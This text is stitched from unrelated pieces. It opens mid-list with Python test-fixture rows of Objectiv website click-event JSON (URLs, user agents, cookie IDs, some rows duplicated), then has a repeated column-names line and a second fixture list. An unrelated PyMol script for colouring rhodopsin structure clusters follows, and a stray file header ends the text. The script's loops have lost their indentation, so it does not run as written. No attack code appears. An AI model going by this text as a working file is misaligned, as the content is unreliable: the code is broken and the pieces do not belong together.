('12b55ed5-4295-4fc1-bf1f-88d64d1ac311','2021-11-29','2021-11-29 10:23:36.286','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-taxonomy", "text": "Docs - Taxonomy", "href": "/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd54aa9a-b8b8-4feb-968d-8fa9f736c596", "time": 1636476191693, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac312','2021-11-29','2021-11-29 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "logo", "text": "Objectiv Documentation Logo", "href": "/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "e2445152-327a-466f-a2bf-116f0146ab7a", "time": 1636476196460, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}')
]
_TEST_DATA_OBJECTIV_COLUMN_NAMES = ['event_id', 'day', 'moment', 'cookie_id', 'value'] | TEST_DATA_OBJECTIV = [
('12b55ed5-4295-4fc1-bf1f-88d64d1ac301','2021-11-30','2021-11-30 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "GitHub", "text": "GitHub", "href": "https://github.com/objectiv", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "729c84f9-91d0-4f9f-be58-5cfb2d8130e4", "time": 1636476263115, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac302','2021-11-30','2021-11-30 10:23:36.290','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "location-stack", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-location-stack", "text": "Docs - Location Stack", "href": "/docs/taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "1049e11c-bb9c-4b84-9dac-b4125998999d", "time": 1636475896879, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac303','2021-11-30','2021-11-30 10:23:36.291','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "header", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-repo-button", "text": "Objectiv on GitHub", "href": "https://github.com/objectiv/objectiv-analytics", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd8239de-032f-499a-9849-8e97214ecdf1", "time": 1636475880112, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac304','2021-11-30','2021-11-30 10:23:36.267','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/modeling/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "LinkContext", "id": "notebook-product-analytics", "text": "sandboxed notebook", "href": "https://notebook.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "a789d8fe-5cd9-4ff0-9780-a56cf094b62a", "time": 1636475922156, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac305','2021-12-01','2021-12-01 10:23:36.276','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "cookie_id": "a30c5ca2-6f0c-4e56-997c-2148bd71ee8d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "67cbfc73-b8bd-40f6-aa8e-88cb73857d09", "time": 1636475947689, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac306','2021-12-01','2021-12-01 10:23:36.279','b2df75d2-d7ca-48ac-9747-af47d7a4a2b1','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Contact Us", "text": "Contact Us", "href": "mailto:hi@objectiv.io", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "899c18aa-a908-43f9-9827-d4b9072205ea", "time": 1636475983057, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac307','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://www.objectiv.io/jobs", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "footer", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Cookies", "text": "Cookies", "href": "/privacy/cookies", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://www.objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "837ae9db-497c-4925-a4c9-b2183bd3056b", "time": 1636476007981, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac308','2021-12-02','2021-12-02 10:23:36.281','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "ExpandableSectionContext", "id": "The Project", "_types": ["AbstractContext", "AbstractLocationContext", "ExpandableSectionContext", "SectionContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 12; Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "cookie_id": "1cc3cb08-010b-465a-8241-88c9b4d233ea", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "5835d00e-4099-44cc-9191-8baccc2d32fa", "time": 1636476074003, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac309','2021-12-02','2021-12-02 14:23:36.282','b2df75d2-d7ca-48ac-9747-af47d7a4a2b3','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "About Us", "text": "About Us", "href": "about", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "cookie_id": "fbca9fc6-4b76-459e-968c-0ecf3c78de4d", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "690ada97-c0fa-4378-9c04-bd1f7753505a", "time": 1636476111218, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac310','2021-12-03','2021-12-03 10:23:36.283','b2df75d2-d7ca-48ac-9747-af47d7a4a2b4','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/about", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "OverlayContext", "id": "hamburger-menu", "_types": ["AbstractContext", "AbstractLocationContext", "OverlayContext", "SectionContext"]}, {"_type": "LinkContext", "id": "Docs", "text": "Docs", "href": "https://objectiv.io/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 10; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "cookie_id": "5b1e395f-ef4c-438c-aab2-ae0aa19131ee", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "089ff754-35d6-49da-bb32-dc9031b10289", "time": 1636476142139, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac311','2021-11-29','2021-11-29 10:23:36.286','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "main", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "SectionContext", "id": "taxonomy", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "cta-docs-taxonomy", "text": "Docs - Taxonomy", "href": "/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-website", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "fd54aa9a-b8b8-4feb-968d-8fa9f736c596", "time": 1636476191693, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}'),
('12b55ed5-4295-4fc1-bf1f-88d64d1ac312','2021-11-29','2021-11-29 10:23:36.287','b2df75d2-d7ca-48ac-9747-af47d7a4a2b2','{"_type": "ClickEvent", "location_stack": [{"_type": "WebDocumentContext", "id": "#document", "url": "https://objectiv.io/docs/taxonomy/", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext", "WebDocumentContext"]}, {"_type": "SectionContext", "id": "navbar-top", "_types": ["AbstractContext", "AbstractLocationContext", "SectionContext"]}, {"_type": "LinkContext", "id": "logo", "text": "Objectiv Documentation Logo", "href": "/docs/", "_types": ["AbstractContext", "AbstractLocationContext", "ActionContext", "ItemContext", "LinkContext"]}], "global_contexts": [{"_type": "ApplicationContext", "id": "objectiv-docs", "_types": ["AbstractContext", "AbstractGlobalContext", "ApplicationContext"]}, {"id": "http_context", "referrer": "https://objectiv.io/", "user_agent": "Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36", "_type": "HttpContext", "_types": ["AbstractContext", "AbstractGlobalContext", "HttpContext"]}, {"id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "cookie_id": "81a8ace2-273b-4b95-b6a6-0fba33858a22", "_type": "CookieIdContext", "_types": ["AbstractContext", "AbstractGlobalContext", "CookieIdContext"]}], "id": "e2445152-327a-466f-a2bf-116f0146ab7a", "time": 1636476196460, "_types": ["AbstractEvent", "ClickEvent", "InteractiveEvent"]}')
]
_TEST_DATA_OBJECTIV_COLUMN_NAMES = ['event_id', 'day', 'moment', 'cookie_id', 'value'] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
''' Align a list of molecules using `super` command in PyMol. The first item
in the list is considered as the reference.
'''
import pymolPy3
import pyrotein as pr
import os
import colorsimple as cs
from loaddata import load_xlsx
# Specify chains to process...
fl_chain = "chains.comp.xlsx"
lines = load_xlsx(fl_chain)
drc = "pdb"
# Define atoms used for distance matrix analysis...
peptide = ["N", "CA", "C", "O"]
# Specify the range of atoms from rhodopsin...
nterm = 1
cterm = 322
len_peptide = (cterm - nterm + 1) * len(peptide)
# Start pymol
pm = pymolPy3.pymolPy3()
## pm("bg white")
# Get the color palette...
color_items = [ i[4] for i in lines ]
spe = { i : 0 for i in color_items }.keys()
color_dict = cs.color_species(spe, hexsym = '0x')
# Define the transmembrane regions...
TMs = {"TM1" : [ 33, 65],
"ICL1" : [ 66, 69],
"TM2" : [ 70, 100],
"ECL1" : [101, 104],
"TM3" : [105, 140],
"ICL2" : [141, 148],
"TM4" : [149, 173],
"ECL2" : [174, 198],
"TM5" : [199, 226],
"ICL3" : [227, 239],
"TM6" : [240, 277],
"ECL3" : [278, 287],
"TM7" : [288, 307],
"L78" : [308, 309],
"H8" : [310, 322] }
# Choose the select to show colors...
disp_range = [33, 322]
color_clusters = [ str(i) for i in range(disp_range[0],disp_range[1] + 1) ]
# [[[ cluster 1 -- active ]]]
# Go through each structure
custom_clusters = [25, 28, 29, 30, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45,
46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62,
63, 64, 65, 68, 69, 70, 71, 72, 73]
# Define custom color
custom_color = {
"active" : "0xffa600",
"inactive" : "0x003f5c",
"average" : "0xffd1ff",
}
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_active, ({" or ".join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_active, %cls_active and resi {"+".join(color_clusters)}")
pm(f"select ret_active, ({" or ".join(entries)}) and resn ret")
pm(f"select hoh_active, ({" or ".join(entries)}) and resn hoh")
pm(f"disable %cls_active")
pm(f"disable %disp_active")
pm(f"disable %ret_active")
pm(f"disable %hoh_active")
# The appearance of TMs in cls_active...
# Cartoon of TMs
pm(f"hide cartoon, %cls_active")
pm(f"set cartoon_color, white, %cls_active")
# Ribbon of TMs
## pm(f"show ribbon, %cls_active")
pm(f"set ribbon_color, white, %cls_active")
# Set the water representation...
pm(f"color {custom_color["active"]}, %hoh_active")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color["active"]}, %cls_active and resi {"+".join(color_clusters)}")
pm(f"set cartoon_color, {custom_color["active"]}, %cls_active and resi {"+".join(color_clusters)}")
## pm(f"set stick_color, {custom_color["active"]}, %cls_active")
pm(f"cmd.color('{custom_color["active"]}', '%cls_active')")
pm(f"util.cnc('%cls_active')")
pm(f"set stick_color, {custom_color["active"]}, %ret_active")
# [[[ cluster 2 -- inactive ]]]
custom_clusters = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
17, 18, 19, 20, 21, 22, 23, 24, 26, 27, 31, 32, 66, 67]
entries = []
for i in custom_clusters[:]:
# Unpack parameters
_, pdb, chain, _, chrome = lines[i][:5]
# Load a mobile structure...
entry = f"{pdb}_{chain}.align"
pdb_path = os.path.join(drc, f"{entry}.pdb")
pm(f"load {pdb_path}")
entries.append(entry)
pm(f"select cls_inactive, ({" or ".join(entries)}) and (resi {nterm}-{cterm})")
pm(f"select disp_inactive, %cls_inactive and resi {"+".join(color_clusters)}")
pm(f"select ret_inactive, ({" or ".join(entries)}) and resn ret")
pm(f"select hoh_inactive, ({" or ".join(entries)}) and resn hoh")
pm(f"disable %cls_inactive")
pm(f"disable %disp_inactive")
pm(f"disable %ret_inactive")
pm(f"disable %hoh_inactive")
pm(f"select cluster_gray, (%cls_active or %cls_inactive) and not (%disp_active or %disp_inactive)")
pm(f"disable %cluster_gray")
# The appearance of cls_inactive
# Cartoon of TMs
pm(f"hide cartoon, %cls_inactive")
pm(f"set cartoon_color, white, %cls_inactive")
# Ribbon of TMs
## pm(f"show ribbon, %cls_inactive")
pm(f"set ribbon_color, white, %cls_inactive")
# Set the water representation...
pm(f"color {custom_color["inactive"]}, %hoh_inactive")
# Color specific region to inactive color...
pm(f"set ribbon_color, {custom_color["inactive"]}, %cls_inactive and resi {"+".join(color_clusters)}")
pm(f"set cartoon_color, {custom_color["inactive"]}, %cls_inactive and resi {"+".join(color_clusters)}")
## pm(f"set stick_color, {custom_color["inactive"]}, %cls_inactive")
pm(f"cmd.color('{custom_color["inactive"]}', '%cls_inactive')")
pm(f"util.cnc('%cls_inactive')")
pm(f"set stick_color, {custom_color["inactive"]}, %ret_inactive")
# Customization
## # Set O, N color...
## pm(f"color red, (%cls_active or %cls_inactive) and (name O*)")
## pm(f"color blue, (%cls_active or %cls_inactive) and (name N*)")
# Set view...
pm("set_view (\\")
pm(" 0.719689012, -0.683778822, 0.120294474,\\")
pm(" -0.315132022, -0.167348713, 0.934176385,\\")
pm(" -0.618639231, -0.710220516, -0.335924447,\\")
pm(" -0.000630774, 0.000504352, -155.440078735,\\")
pm(" 56.917179108, 13.737834930, 0.117419243,\\")
pm(" 113.265342712, 197.978042603, -20.000000000 )")
# Resize water sphere scale...
pm(f"set sphere_scale, 0.25, %hoh_active or %hoh_inactive")
# Hide the non-rhodopsin region...
pm(f"hide cartoon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {nterm}-{cterm})")
pm(f"hide ribbon, (not resi {disp_range[0]}-{disp_range[1]})")
transp = 0
pm("bg white")
pm("set ribbon_color, gray, %cluster_gray")
pm(f"set ribbon_transparency, {transp}")
pm(f"set stick_transparency, {transp}")
# Highlight average structures...
pm("load active.pdb")
pm(f"set cartoon_transparency, {transp}, active")
pm(f"set cartoon_color, {custom_color["active"]}, active")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and active")
pm("load inactive.pdb")
pm(f"set cartoon_transparency, {transp}, inactive")
pm(f"set cartoon_color, {custom_color["inactive"]}, inactive")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and inactive")
pm("load average.pdb")
pm(f"set cartoon_transparency, {transp}, average")
pm(f"set cartoon_color, {custom_color["average"]}, average")
pm(f"hide cartoon, (not resi {disp_range[0]}-{disp_range[1]}) and average")
# Select the transmembrane...
for k, v in TMs.items():
pm(f"select {k}, resi {v[0]}-{v[1]} and (%average or %active or %inactive)")
pm(f"disable {k}")
# Set lighting to rubber...
pm("set ambient, 0.05")
pm("set direct, 0.2")
pm("set spec_direct, 0")
pm("set shininess, 10.")
pm("set reflect, 0.5")
pm("set spec_count, -1")
pm("set spec_reflect, -1.")
pm("set specular, 1")
pm("set specular_intensity, 0.5")
# Try265
pm(f"select his211, resi 211")
pm(f"select glu122, resi 122")
pm(f"show sticks, %his211 or %glu122")
# Highlight environment
pm(f"hide cartoon, average or inactive")
pm(f"hide sticks, average or inactive")
pm(f"set cartoon_transparency, 0.8, active or inactive or average")
pm(f"hide sticks, ret_inactive")
pm(f"hide sticks, cls_inactive")
pm(f"hide everything, hoh_inactive")
pm(f"deselect")
input("Press Enter to exit...")
# 9.63 x 5.30 for output
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
